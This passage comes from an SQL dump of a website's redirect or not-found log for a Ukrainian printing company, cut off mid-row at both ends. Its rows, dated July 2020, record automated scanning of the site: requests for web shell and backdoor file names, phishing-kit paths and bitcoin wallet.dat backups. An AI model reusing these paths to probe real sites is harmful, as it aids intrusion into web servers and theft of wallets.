00:00:00',301),(17526,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594042882247',NULL,'','',1,0,'2020-07-06 13:41:23','0000-00-00 00:00:00',301),(17527,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=17418',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 13:41:23','0000-00-00 00:00:00',301),(17528,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/websocket?url=https://ekvatorprint.com.ua/contacts&nocache=1594042942249',NULL,'','',1,0,'2020-07-06 13:42:23','0000-00-00 00:00:00',301),(17529,'https://ekvatorprint.com.ua/2ef8e3df-30f3-4066-90c5-69de2633dd993z6xqj1uckxqmyzbgwfqc6ndp0_6copny3v9pbvzq-hw9ao6y1zwtknl4y6-mqda7nb5jvd4m0xifjnk5nmzzw/init?url=https://ekvatorprint.com.ua/contacts&plugins=mb&wsm&cb&xhr_content&data={\"data\":[{\"plugin\":\"wsm\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"},{\"plugin\":\"xhr_content\",\"parameters\":\"{\\\"referrer\\\":\\\"https://ekvatorprint.com.ua/plotternaya-podrezka\\\"}\"}]}&istoplevel=true&nocache=1bfe0',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2020-07-06 13:42:23','0000-00-00 00:00:00',301),(17530,'https://ekvatorprint.com.ua/wp-admin/include.php.php',NULL,'http://site.ru','',2,0,'2020-07-06 18:30:14','0000-00-00 00:00:00',301),(17531,'https://ekvatorprint.com.ua/includes/includes.php',NULL,'http://site.ru','',5,0,'2020-07-06 19:13:39','0000-00-00 00:00:00',301),(17532,'https://ekvatorprint.com.ua/moshax.php',NULL,'http://site.ru','',5,0,'2020-07-06 20:31:23','0000-00-00 00:00:00',301),(17533,'http://ekvatorprint.com.ua/wp-admin/include.php.php/js/mage/cookies.js',NULL,'ekvatorprint.com.ua/wp-admin/include.php.PhP','',2,0,'2020-07-06 23:08:12','0000-00-00 00:00:00',301),(17534,'https://ekvatorprint.com.ua/docindex.php',NULL,'http://site.ru','',8,0,'2020-07-07 01:29:52','0000-00-00 00:00:00',301),(17535,'https://ekvatorprint.com.ua/libraries/phputf8/mbstring/wugznindex.php',NULL,'http://site.ru','',1,0,'2020-07-07 12:07:36','0000-00-00 00:00:00',301),(17536,'https://ekvatorprint.com.ua/nsgin.com/simple.php5',NULL,'http://site.ru','',2,0,'2020-07-07 12:29:13','0000-00-00 00:00:00',301),(17537,'https://ekvatorprint.com.ua/wp-admin/code87/5.php',NULL,'http://site.ru','',8,0,'2020-07-07 12:30:55','0000-00-00 00:00:00',301),(17538,'https://ekvatorprint.com.ua/home/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 12:33:48','0000-00-00 00:00:00',301),(17539,'https://ekvatorprint.com.ua/templates/protostar/o.php',NULL,'http://site.ru','',3,0,'2020-07-07 12:40:39','0000-00-00 00:00:00',301),(17540,'https://ekvatorprint.com.ua/language/ru-ru/ru-ru.php',NULL,'http://site.ru','',2,0,'2020-07-07 13:02:26','0000-00-00 00:00:00',301),(17541,'https://ekvatorprint.com.ua/plugins/vmcustom/vmcustom.php',NULL,'http://site.ru','',3,0,'2020-07-07 13:29:29','0000-00-00 00:00:00',301),(17542,'https://ekvatorprint.com.ua/media/mod_languages/mod_languages.php',NULL,'http://site.ru','',1,0,'2020-07-07 13:52:04','0000-00-00 00:00:00',301),(17543,'https://ekvatorprint.com.ua/sbyq8l.php',NULL,'http://site.ru','',3,0,'2020-07-07 14:15:28','0000-00-00 00:00:00',301),(17544,'https://ekvatorprint.com.ua/detallito.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 14:26:29','0000-00-00 00:00:00',301),(17545,'https://ekvatorprint.com.ua/modules/mod_verison/css.php',NULL,'http://site.ru','',3,0,'2020-07-07 14:47:18','0000-00-00 00:00:00',301),(17546,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/wawalo.php.php',NULL,'http://site.ru','',4,0,'2020-07-07 14:51:37','0000-00-00 00:00:00',301),(17547,'https://ekvatorprint.com.ua/images/license.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:09:09','0000-00-00 00:00:00',301),(17548,'https://ekvatorprint.com.ua/libraries/joomla/application/web/router/62931939.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:11:34','0000-00-00 00:00:00',301),(17549,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/6010.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:12:13','0000-00-00 00:00:00',301),(17550,'https://ekvatorprint.com.ua/media/media/data.php',NULL,'http://site.ru','',2,0,'2020-07-07 15:13:46','0000-00-00 00:00:00',301),(17551,'https://ekvatorprint.com.ua/clienteempresarialesfera.online/includes.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:39:43','0000-00-00 00:00:00',301),(17552,'https://ekvatorprint.com.ua/components/as.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-07 15:42:29','0000-00-00 00:00:00',301),(17553,'https://ekvatorprint.com.ua/libraries/joomla/mail/wrapper/tuzbsindex.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:47:15','0000-00-00 00:00:00',301),(17554,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/postgresql/.h..php',NULL,'http://site.ru','',2,0,'2020-07-07 16:02:40','0000-00-00 00:00:00',301),(17555,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/zr.php',NULL,'http://site.ru','',7,0,'2020-07-07 18:14:38','0000-00-00 00:00:00',301),(17556,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/wp-imags.php',NULL,'http://site.ru','',1,0,'2020-07-07 18:24:43','0000-00-00 00:00:00',301),(17557,'https://ekvatorprint.com.ua/libraries/joomla/base/js.php',NULL,'http://site.ru','',2,0,'2020-07-07 19:06:36','0000-00-00 00:00:00',301),(17558,'https://ekvatorprint.com.ua/cjfeax.php',NULL,'http://site.ru','',3,0,'2020-07-07 19:08:40','0000-00-00 00:00:00',301),(17559,'https://ekvatorprint.com.ua/libraries/joomla/cache/storage/vrzjiindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 19:57:02','0000-00-00 00:00:00',301),(17560,'https://ekvatorprint.com.ua/language/sidwso.php',NULL,'http://site.ru','',3,0,'2020-07-07 21:18:47','0000-00-00 00:00:00',301),(17561,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/isyruphjtn.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:25:09','0000-00-00 00:00:00',301),(17562,'https://ekvatorprint.com.ua/images/headers/images.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:27:07','0000-00-00 00:00:00',301),(17563,'https://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/beautifu.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:43:50','0000-00-00 00:00:00',301),(17564,'https://ekvatorprint.com.ua/includes/moshax.php',NULL,'http://site.ru','',4,0,'2020-07-07 21:45:42','0000-00-00 00:00:00',301),(17565,'https://ekvatorprint.com.ua/templates/beez3/alfa.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:46:10','0000-00-00 00:00:00',301),(17566,'https://ekvatorprint.com.ua/language/pdf_fonts/xml.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:47:58','0000-00-00 00:00:00',301),(17567,'https://ekvatorprint.com.ua/consultorestimeshare.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 22:14:28','0000-00-00 00:00:00',301),(17568,'https://ekvatorprint.com.ua/cache/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-07 22:39:30','0000-00-00 00:00:00',301),(17569,'https://ekvatorprint.com.ua/templates/protostar/news.php',NULL,'http://site.ru','',2,0,'2020-07-07 22:45:22','0000-00-00 00:00:00',301),(17570,'https://ekvatorprint.com.ua/administrator/jl08d260.php',NULL,'http://site.ru','',1,0,'2020-07-07 23:04:20','0000-00-00 00:00:00',301),(17571,'https://ekvatorprint.com.ua/tvrmpt.php',NULL,'http://site.ru','',2,0,'2020-07-07 23:04:29','0000-00-00 00:00:00',301),(17572,'https://ekvatorprint.com.ua/odfnjn.php',NULL,'http://site.ru','',2,0,'2020-07-07 23:09:15','0000-00-00 00:00:00',301),(17573,'https://ekvatorprint.com.ua/images/table.php',NULL,'http://site.ru','',3,0,'2020-07-07 23:37:42','0000-00-00 00:00:00',301),(17574,'https://ekvatorprint.com.ua/components/com_newsfeeds/views/d1.php',NULL,'http://site.ru','',1,0,'2020-07-07 23:59:20','0000-00-00 00:00:00',301),(17575,'https://ekvatorprint.com.ua/language/ar-aa/c16b/oqkoiindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 00:00:38','0000-00-00 00:00:00',301),(17576,'https://ekvatorprint.com.ua/administrator/templates/isis/doc.php',NULL,'http://site.ru','',2,0,'2020-07-08 00:21:47','0000-00-00 00:00:00',301),(17577,'https://ekvatorprint.com.ua/files/fileswb.php',NULL,'http://site.ru','',3,0,'2020-07-08 00:29:40','0000-00-00 00:00:00',301),(17578,'https://ekvatorprint.com.ua/components/com_mailto/mod/px.php',NULL,'http://site.ru','',5,0,'2020-07-08 00:52:03','0000-00-00 00:00:00',301),(17579,'https://ekvatorprint.com.ua/tmp/sidwso.php',NULL,'http://site.ru','',5,0,'2020-07-08 00:57:57','0000-00-00 00:00:00',301),(17580,'https://ekvatorprint.com.ua/libraries/joomla/string/vgwmrindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 01:44:32','0000-00-00 00:00:00',301),(17581,'https://ekvatorprint.com.ua/nsyyg9.php',NULL,'http://site.ru','',1,0,'2020-07-08 02:22:18','0000-00-00 00:00:00',301),(17582,'https://ekvatorprint.com.ua/administrator/components/com_banners/models/forms/wp-side.php',NULL,'http://site.ru','',1,0,'2020-07-08 02:34:47','0000-00-00 00:00:00',301),(17583,'https://ekvatorprint.com.ua/bin/sidwso.php',NULL,'http://site.ru','',3,0,'2020-07-08 02:39:14','0000-00-00 00:00:00',301),(17584,'https://ekvatorprint.com.ua/logs.php',NULL,'http://site.ru','',5,0,'2020-07-08 02:41:22','0000-00-00 00:00:00',301),(17585,'https://ekvatorprint.com.ua/aguasie.com/docindex.php',NULL,'http://site.ru','',3,0,'2020-07-08 03:17:05','0000-00-00 00:00:00',301),(17586,'https://ekvatorprint.com.ua/templates/atomic/l.php',NULL,'http://site.ru','',2,0,'2020-07-08 03:51:24','0000-00-00 00:00:00',301),(17587,'https://ekvatorprint.com.ua/ijiti5.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:19:01','0000-00-00 00:00:00',301),(17588,'https://ekvatorprint.com.ua/cache/rss.php',NULL,'http://site.ru','',2,0,'2020-07-08 04:20:11','0000-00-00 00:00:00',301),(17589,'https://ekvatorprint.com.ua/bfmy4u.php',NULL,'http://site.ru','',5,0,'2020-07-08 04:22:34','0000-00-00 00:00:00',301),(17590,'https://ekvatorprint.com.ua/wmuwp8.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:23:34','0000-00-00 00:00:00',301),(17591,'https://ekvatorprint.com.ua/templates/protostar/wp.php',NULL,'http://site.ru','',2,0,'2020-07-08 04:38:26','0000-00-00 00:00:00',301),(17592,'https://ekvatorprint.com.ua/templates/protostar/66989894562222323326.php',NULL,'http://site.ru','',3,0,'2020-07-08 04:50:42','0000-00-00 00:00:00',301),(17593,'https://ekvatorprint.com.ua/wp-admin/wp-admin.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:10:05','0000-00-00 00:00:00',301),(17594,'https://ekvatorprint.com.ua/images/webmap.php',NULL,'http://site.ru','',3,0,'2020-07-08 05:38:35','0000-00-00 00:00:00',301),(17595,'https://ekvatorprint.com.ua/templates/beez5/html/com_contact/dm2.php',NULL,'http://site.ru','',1,0,'2020-07-08 06:03:03','0000-00-00 00:00:00',301),(17596,'https://ekvatorprint.com.ua/blog/cache/cache.php',NULL,'http://site.ru','',3,0,'2020-07-08 06:06:16','0000-00-00 00:00:00',301),(17597,'https://ekvatorprint.com.ua/components/com_foxcontact/aku.php',NULL,'http://site.ru','',1,0,'2020-07-08 06:10:32','0000-00-00 00:00:00',301),(17598,'https://ekvatorprint.com.ua/cli/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-08 07:01:04','0000-00-00 00:00:00',301),(17599,'https://ekvatorprint.com.ua/bitcoin/backups/wallet.dat',NULL,'','',2,0,'2020-07-08 07:22:32','0000-00-00 00:00:00',301),(17600,'https://ekvatorprint.com.ua/backups/bitcoin/wallet.dat',NULL,'','',2,0,'2020-07-08 07:25:01','0000-00-00 00:00:00',301),(17601,'https://ekvatorprint.com.ua/backups/wallet.dat',NULL,'','',24,0,'2020-07-08 07:25:37','0000-00-00 00:00:00',301),(17602,'https://ekvatorprint.com.ua/libraries/joomla/cache/storage/xcrvbindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:46:32','0000-00-00 00:00:00',301),(17603,'https://ekvatorprint.com.ua/cli/xjs14.php',NULL,'http://site.ru','',1,0,'2020-07-08 07:48:41','0000-00-00 00:00:00',301),(17604,'https://ekvatorprint.com.ua/cli/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:49:51','0000-00-00 00:00:00',301),(17605,'https://ekvatorprint.com.ua/administrator/components/com_admin/helpers/streamed.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:09:03','0000-00-00 00:00:00',301),(17606,'https://ekvatorprint.com.ua/components/com_banners/models/css.php',NULL,'http://site.ru','',3,0,'2020-07-08 09:09:20','0000-00-00 00:00:00',301),(17607,'https://ekvatorprint.com.ua/kmt2wh.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:15:34','0000-00-00 00:00:00',301),(17608,'https://ekvatorprint.com.ua/templates/atomic/fshell.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:24:07','0000-00-00 00:00:00',301),(17609,'https://ekvatorprint.com.ua/modules/mod_footer/tmpl/tmpl.php',NULL,'http://site.ru','',3,0,'2020-07-08 09:34:46','0000-00-00 00:00:00',301),(17610,'https://ekvatorprint.com.ua/files/sidwso.php',NULL,'http://site.ru','',3,0,'2020-07-08 09:35:49','0000-00-00 00:00:00',301),(17611,'https://ekvatorprint.com.ua/plugins/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:57:39','0000-00-00 00:00:00',301),(17612,'https://ekvatorprint.com.ua/blog/blog.php',NULL,'http://site.ru','',3,0,'2020-07-08 09:59:40','0000-00-00 00:00:00',301),(17613,'https://ekvatorprint.com.ua/administrator/c:/a/wamp/www/curb-appea/administrator/conf.php',NULL,'http://site.ru','',2,0,'2020-07-08 10:27:11','0000-00-00 00:00:00',301),(17614,'https://ekvatorprint.com.ua/modules/mod_users_latest/data.php',NULL,'http://site.ru','',4,0,'2020-07-08 10:59:53','0000-00-00 00:00:00',301),(17615,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/magic.php',NULL,'http://site.ru','',2,0,'2020-07-08 11:49:25','0000-00-00 00:00:00',301),(17616,'https://ekvatorprint.com.ua/layouts/joomla/joomla.php',NULL,'http://site.ru','',1,0,'2020-07-08 12:41:43','0000-00-00 00:00:00',301),(17617,'https://ekvatorprint.com.ua/administrator/components/img.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:30:04','0000-00-00 00:00:00',301),(17618,'https://ekvatorprint.com.ua/tmp/adrixvz4.php',NULL,'http://site.ru','',1,0,'2020-07-08 14:03:58','0000-00-00 00:00:00',301),(17619,'https://ekvatorprint.com.ua/templates/beez3/wp.php',NULL,'http://site.ru','',2,0,'2020-07-08 14:05:36','0000-00-00 00:00:00',301),(17620,'https://ekvatorprint.com.ua/xmlrpc/cache/xml.php',NULL,'http://site.ru','',2,0,'2020-07-08 14:10:33','0000-00-00 00:00:00',301),(17621,'https://ekvatorprint.com.ua/components/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 14:32:45','0000-00-00 00:00:00',301),(17622,'https://ekvatorprint.com.ua/administrator/components/com_ajax/theme.php',NULL,'http://site.ru','',1,0,'2020-07-08 16:50:52','0000-00-00 00:00:00',301),(17623,'https://ekvatorprint.com.ua/xaolicygrk.php',NULL,'http://site.ru','',1,0,'2020-07-08 17:33:24','0000-00-00 00:00:00',301),(17624,'https://ekvatorprint.com.ua/aguasie.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 17:55:59','0000-00-00 00:00:00',301),(17625,'https://ekvatorprint.com.ua/components/com_akeeba/models/css_.php.suspected',NULL,'http://site.ru','',5,0,'2020-07-08 18:25:39','0000-00-00 00:00:00',301),(17626,'https://ekvatorprint.com.ua/administrator/components/com_admin/models/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-08 18:47:43','0000-00-00 00:00:00',301),(17627,'https://ekvatorprint.com.ua/language/overrides/overrides.php',NULL,'http://site.ru','',1,0,'2020-07-08 18:49:09','0000-00-00 00:00:00',301),(17628,'https://ekvatorprint.com.ua/language/en-gb/en-gb.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-08 18:50:16','0000-00-00 00:00:00',301),(17629,'https://ekvatorprint.com.ua/administrator/components/com_ajax/images.php',NULL,'http://site.ru','',2,0,'2020-07-08 18:53:47','0000-00-00 00:00:00',301),(17630,'https://ekvatorprint.com.ua/plugins/pluginsc.php',NULL,'http://site.ru','',2,0,'2020-07-08 19:17:21','0000-00-00 00:00:00',301),(17631,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/wawalo.php',NULL,'http://site.ru','',3,0,'2020-07-08 19:43:50','0000-00-00 00:00:00',301),(17632,'https://ekvatorprint.com.ua/administrator/components/com_banners/models/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-08 20:25:26','0000-00-00 00:00:00',301),(17633,'https://ekvatorprint.com.ua/modules/mod_verison/mod_verison.php',NULL,'http://site.ru','',2,0,'2020-07-08 20:27:06','0000-00-00 00:00:00',301),(17634,'https://ekvatorprint.com.ua/tgfqxt.php',NULL,'http://site.ru','',1,0,'2020-07-08 20:56:54','0000-00-00 00:00:00',301),(17635,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/xml.php',NULL,'http://site.ru','',3,0,'2020-07-08 21:14:50','0000-00-00 00:00:00',301),(17636,'https://ekvatorprint.com.ua/templates/atomic/wp-img.php',NULL,'http://site.ru','',4,0,'2020-07-08 21:43:06','0000-00-00 00:00:00',301),(17637,'https://ekvatorprint.com.ua/nsgin.com/cache/blackhat.php',NULL,'http://site.ru','',1,0,'2020-07-08 21:43:46','0000-00-00 00:00:00',301),(17638,'https://ekvatorprint.com.ua/me63ql.php',NULL,'http://site.ru','',2,0,'2020-07-08 21:45:09','0000-00-00 00:00:00',301),(17639,'https://ekvatorprint.com.ua/libraries/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:59:34','0000-00-00 00:00:00',301),(17640,'https://ekvatorprint.com.ua/libraries/joomla/mail/language/rjtwbindex.php.php',NULL,'http://site.ru','',3,0,'2020-07-08 23:17:30','0000-00-00 00:00:00',301),(17641,'https://ekvatorprint.com.ua/templates/atomic/mini_shell.php',NULL,'http://site.ru','',1,0,'2020-07-08 23:18:41','0000-00-00 00:00:00',301),(17642,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/0x.php',NULL,'http://site.ru','',3,0,'2020-07-09 00:13:43','0000-00-00 00:00:00',301),(17643,'https://ekvatorprint.com.ua/templates/atomic/ex.php',NULL,'http://site.ru','',1,0,'2020-07-09 00:59:52','0000-00-00 00:00:00',301),(17644,'https://ekvatorprint.com.ua/fshell.php',NULL,'http://site.ru','',2,0,'2020-07-09 01:04:40','0000-00-00 00:00:00',301),(17645,'https://ekvatorprint.com.ua/plugins/system/css.php',NULL,'http://site.ru','',1,0,'2020-07-09 01:26:24','0000-00-00 00:00:00',301),(17646,'https://ekvatorprint.com.ua/deep.php',NULL,'http://site.ru','',2,0,'2020-07-09 01:53:56','0000-00-00 00:00:00',301),(17647,'https://ekvatorprint.com.ua/templates/atomic/info.php',NULL,'http://site.ru','',4,0,'2020-07-09 02:47:46','0000-00-00 00:00:00',301),(17648,'https://ekvatorprint.com.ua/libraries/joomla/github/package/data/48129110.php',NULL,'http://site.ru','',1,0,'2020-07-09 03:54:16','0000-00-00 00:00:00',301),(17649,'https://ekvatorprint.com.ua/templates/fusion/fusion.php',NULL,'http://site.ru','',1,0,'2020-07-09 03:54:44','0000-00-00 00:00:00',301),(17650,'https://ekvatorprint.com.ua/modules/mod_breadcrumbs/wp-class.php',NULL,'http://site.ru','',1,0,'2020-07-09 04:17:21','0000-00-00 00:00:00',301),(17651,'https://ekvatorprint.com.ua/administrator/components/com_ajax/dm2.php',NULL,'http://site.ru','',1,0,'2020-07-09 05:26:28','0000-00-00 00:00:00',301),(17652,'https://ekvatorprint.com.ua/gtech.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-09 05:48:50','0000-00-00 00:00:00',301),(17653,'https://ekvatorprint.com.ua/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87_hack.php',NULL,'http://site.ru','',1,0,'2020-07-09 06:14:23','0000-00-00 00:00:00',301),(17654,'https://ekvatorprint.com.ua/oluxx.php',NULL,'http://site.ru','',1,0,'2020-07-09 06:17:36','0000-00-00 00:00:00',301),(17655,'https://ekvatorprint.com.ua/error_log.php',NULL,'http://site.ru','',2,0,'2020-07-09 09:13:24','0000-00-00 00:00:00',301),(17656,'https://ekvatorprint.com.ua/nsecures.php',NULL,'http://site.ru','',1,0,'2020-07-09 09:46:32','0000-00-00 00:00:00',301),(17657,'https://ekvatorprint.com.ua/cache/ups.php',NULL,'http://site.ru','',3,0,'2020-07-09 14:52:12','0000-00-00 00:00:00',301),(17658,'https://ekvatorprint.com.ua/cache/ups.php.suspected',NULL,'http://site.ru','',6,0,'2020-07-09 14:54:58','0000-00-00 00:00:00',301),(17659,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/others/media-admin.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-09 16:00:55','0000-00-00 00:00:00',301),(17660,'https://ekvatorprint.com.ua/libraries/joomla/base/phpmailer.php',NULL,'http://site.ru','',5,0,'2020-07-09 16:11:34','0000-00-00 00:00:00',301),(17661,'https://ekvatorprint.com.ua/lf.php',NULL,'http://site.ru','',7,0,'2020-07-09 16:26:14','0000-00-00 00:00:00',301),(17662,'https://ekvatorprint.com.ua/components/com_banners/metadata.php',NULL,'http://site.ru','',4,0,'2020-07-09 16:27:08','0000-00-00 00:00:00',301),(17663,'https://ekvatorprint.com.ua/backup_2/wp-includes/simplepie/xml/declaration/792ade9.php',NULL,'http://site.ru','',1,0,'2020-07-09 16:31:40','0000-00-00 00:00:00',301),(17664,'https://ekvatorprint.com.ua/administrator/components/com_akeeba/backupengine/filter/stack/beautifu.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-09 16:52:43','0000-00-00 00:00:00',301),(17665,'https://ekvatorprint.com.ua/ups.php.suspected',NULL,'http://site.ru','',6,0,'2020-07-09 16:55:58','0000-00-00 00:00:00',301),(17666,'https://ekvatorprint.com.ua/pamos.php',NULL,'http://site.ru','',3,0,'2020-07-09 17:24:52','0000-00-00 00:00:00',301),(17667,'https://ekvatorprint.com.ua/media/.fea20.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-09 17:27:09','0000-00-00 00:00:00',301),(17668,'https://ekvatorprint.com.ua/inco.php',NULL,'http://site.ru','',2,0,'2020-07-09 17:55:09','0000-00-00 00:00:00',301),(17669,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/newversion.php',NULL,'http://site.ru','',1,0,'2020-07-09 18:24:50','0000-00-00 00:00:00',301),(17670,'https://ekvatorprint.com.ua/assets/images/doc.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-09 18:28:07','0000-00-00 00:00:00',301),(17671,'https://ekvatorprint.com.ua/small_dick.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-09 18:29:18','0000-00-00 00:00:00',301),(17672,'https://ekvatorprint.com.ua/administrator/components/com_akeeba/backupengine/util/log/bird.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-09 19:15:37','0000-00-00 00:00:00',301),(17673,'https://ekvatorprint.com.ua/cache/0908989909876/cnxbxnxixix/wetransfer/wetransfer/index.php',NULL,'http://site.ru','',3,0,'2020-07-09 19:50:52','0000-00-00 00:00:00',301),(17674,'https://ekvatorprint.com.ua/history/sporttam/resources/views/user/edit.blade.php',NULL,'http://site.ru','',3,0,'2020-07-09 20:14:14','0000-00-00 00:00:00',301),(17675,'https://ekvatorprint.com.ua/administrator/components/com_banners/models/forms/new_side.php',NULL,'http://site.ru','',2,0,'2020-07-09 20:37:47','0000-00-00 00:00:00',301),(17676,'https://ekvatorprint.com.ua/asdf.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-09 20:45:12','0000-00-00 00:00:00',301),(17677,'https://ekvatorprint.com.ua/tranesers2244554223/wetransfer/wetransfer/c08fxz9tl7ajplxn9wc3z95b.php',NULL,'http://site.ru','',2,0,'2020-07-09 22:00:17','0000-00-00 00:00:00',301),(17678,'https://ekvatorprint.com.ua/assets/images/ups.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-09 22:06:10','0000-00-00 00:00:00',301),(17679,'https://ekvatorprint.com.ua/wetranafer4893489/wetransfer/wetransfer/index.php',NULL,'http://site.ru','',4,0,'2020-07-09 22:06:39','0000-00-00 00:00:00',301),(17680,'https://ekvatorprint.com.ua/administrator/.14e20.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-09 22:31:31','0000-00-00 00:00:00',301),(17681,'https://ekvatorprint.com.ua/components/com_banners/metadata.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-09 22:34:06','0000-00-00 00:00:00',301),(17682,'https://ekvatorprint.com.ua/manager/media/browser/mcpuk/js/browser/joiner.php',NULL,'http://site.ru','',4,0,'2020-07-09 22:37:01','0000-00-00 00:00:00',301),(17683,'https://ekvatorprint.com.ua/undefined',NULL,'https://ekvatorprint.com.ua/','',21,0,'2020-07-10 23:48:45','0000-00-00 00:00:00',301),(17684,'https://ekvatorprint.com.ua/outpost.php',NULL,'http://site.ru','',4,0,'2020-07-11 19:16:54','0000-00-00 00:00:00',301),(17685,'https://ekvatorprint.com.ua/pdo.inc.php',NULL,'http://site.ru','',2,0,'2020-07-11 19:45:30','0000-00-00 00:00:00',301),(17686,'https://ekvatorprint.com.ua/lsn_an.php',NULL,'http://site.ru','',2,0,'2020-07-11 19:46:50','0000-00-00 00:00:00',301),(17687,'https://ekvatorprint.com.ua/ui-elements.php',NULL,'http://site.ru','',3,0,'2020-07-11 22:56:01','0000-00-00 00:00:00',301),(17688,'https://ekvatorprint.com.ua/mod_config.php',NULL,'http://site.ru','',1,0,'2020-07-11 23:03:44','0000-00-00 00:00:00',301),(17689,'https://ekvatorprint.com.ua/mary.php',NULL,'http://site.ru','',3,0,'2020-07-11 23:23:13','0000-00-00 00:00:00',301),(17690,'https://ekvatorprint.com.ua/toolsa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-11 23:57:04','0000-00-00 00:00:00',301),(17691,'https://ekvatorprint.com.ua/load-config.php',NULL,'http://site.ru','',4,0,'2020-07-12 01:11:56','0000-00-00 00:00:00',301),(17692,'https://ekvatorprint.com.ua/image.php',NULL,'http://site.ru','',4,0,'2020-07-12 01:36:39','0000-00-00 00:00:00',301),(17693,'https://ekvatorprint.com.ua/prom.php',NULL,'http://site.ru','',3,0,'2020-07-12 04:16:04','0000-00-00 00:00:00',301),(17694,'https://ekvatorprint.com.ua/ok.php',NULL,'http://site.ru','',8,0,'2020-07-12 04:20:45','0000-00-00 00:00:00',301),(17695,'https://ekvatorprint.com.ua/aws.php',NULL,'http://site.ru','',2,0,'2020-07-12 06:10:53','0000-00-00 00:00:00',301),(17696,'https://ekvatorprint.com.ua/usi.php',NULL,'http://site.ru','',1,0,'2020-07-12 06:16:05','0000-00-00 00:00:00',301),(17697,'https://ekvatorprint.com.ua/.smileys/license.php',NULL,'http://site.ru','',1,0,'2020-07-12 07:03:24','0000-00-00 00:00:00',301),(17698,'https://ekvatorprint.com.ua/wp-consoles.php',NULL,'http://site.ru','',6,0,'2020-07-12 07:06:46','0000-00-00 00:00:00',301),(17699,'https://ekvatorprint.com.ua/defined.php',NULL,'http://site.ru','',1,0,'2020-07-12 08:24:09','0000-00-00 